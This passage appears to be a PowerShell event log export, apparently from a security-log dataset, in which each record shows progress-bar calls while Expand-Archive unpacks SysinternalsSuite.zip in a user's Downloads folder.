ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="297"
 
-RECORD 25----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="96"
                                                                                                                                                                                                                                                                 
-RECORD 26----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="296"
 
-RECORD 27----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="96"
                                                                                                                                                                                                                                                                 
-RECORD 28----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="295"
 
-RECORD 29----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="96"
                                                                                                                                                                                                                                                                 
-RECORD 30----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="294"
 
-RECORD 31----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="95"
                                                                                                                                                                                                                                                                 
-RECORD 32----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="293"
 
-RECORD 33----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="95"
                                                                                                                                                                                                                                                                 
-RECORD 34----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="292"
 
-RECORD 35----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="95"
                                                                                                                                                                                                                                                                 
-RECORD 36----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="291"
 
-RECORD 37----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 38----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="290"
 
-RECORD 39----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 40----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="289"
 
-RECORD 41----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 42----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="288"
 
-RECORD 43----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 44----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="287"
 
-RECORD 45----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="93"
                                                                                                                                                                                                                                                                 
-RECORD 46----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="286"
 
-RECORD 47----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="93"
                                                                                                                                                                                                                                                                 
-RECORD 48----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="285"
 
-RECORD 49----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="93"
                                                                                                                                                                                                                                                                 
-RECORD 50----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="284"
 
-RECORD 51----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="92"
                                                                                                                                                                                                                                                                 
-RECORD 52----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="283"
 
-RECORD 53----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="92"
                                                                                                                                                                                                                                                                 
-RECORD 54----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="282"
 
-RECORD 55----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="92"
                                                                                                                                                                                                                                                                 
-RECORD 56----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="281"
 
-RECORD 57----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="91"
                                                                                                                                                                                                                                                                 
-RECORD 58----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="280"
 
-RECORD 59----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="91"
                                                                                                                                                                                                                                                                 
-RECORD 60----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="279"
 
-RECORD 61----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="91"
                                                                                                                                                                                                                                                                 
-RECORD 62----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="278"
 
-RECORD 63----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="90"
                                                                                                                                                                                                                                                                 
-RECORD 64----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="277"
 
-RECORD 65----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="90"
                                                                                                                                                                                                                                                                 
-RECORD 66----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="276"
 
-RECORD 67----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="90"
                                                                                                                                                                                                                                                                 
-RECORD 68----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
